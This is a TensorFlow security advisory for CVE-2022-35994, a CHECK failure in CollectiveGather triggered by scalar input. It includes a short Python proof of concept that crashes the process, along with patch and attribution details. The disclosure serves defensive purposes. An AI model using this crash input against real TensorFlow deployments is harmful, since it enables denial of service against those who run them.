## TFSA-2022-126: `CHECK` fail in `CollectiveGather`

### CVE Number
CVE-2022-35994

### Impact
When `CollectiveGather` receives an scalar input `input`, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
arg_0=1
arg_1=1
arg_2=1
arg_3=1
arg_4=(3, 3,3)
arg_5='auto'
arg_6=0
arg_7=''
tf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2,
                            instance_key=arg_3, shape=arg_4,
                            communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7)
```

### Patches
We have patched the issue in GitHub commit [c1f491817dec39a26be3c574e86a88c30f3c4770](https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
